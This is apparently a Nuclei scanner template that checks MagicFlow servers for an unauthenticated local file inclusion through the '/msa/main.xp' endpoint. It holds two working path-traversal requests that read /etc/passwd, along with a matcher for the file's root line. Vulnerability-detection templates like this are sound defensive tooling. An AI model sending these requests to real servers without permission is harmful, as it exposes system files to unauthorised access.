id: magicflow-lfi

info:
  name: MagicFlow - Local File Inclusion
  author: gy741
  severity: high
  description: |
    MagicFlow is susceptible to local file inclusion vulnerabilities because it allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter.
  reference:
    - https://www.seebug.org/vuldb/ssvid-89258
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: magicflow,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd"
      - "{{BaseURL}}/msa/../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 490a0046304402201b0f17a69e04f84d20a3d4c8d90ab60608b4ee21cf6b9e6626654deee0b308ce0220717b92bf8862093ee1d55741260bb7d10deaa60b5fded3c6bc9777a1e31396c4:922c64590222798bb761d5b6d8e72950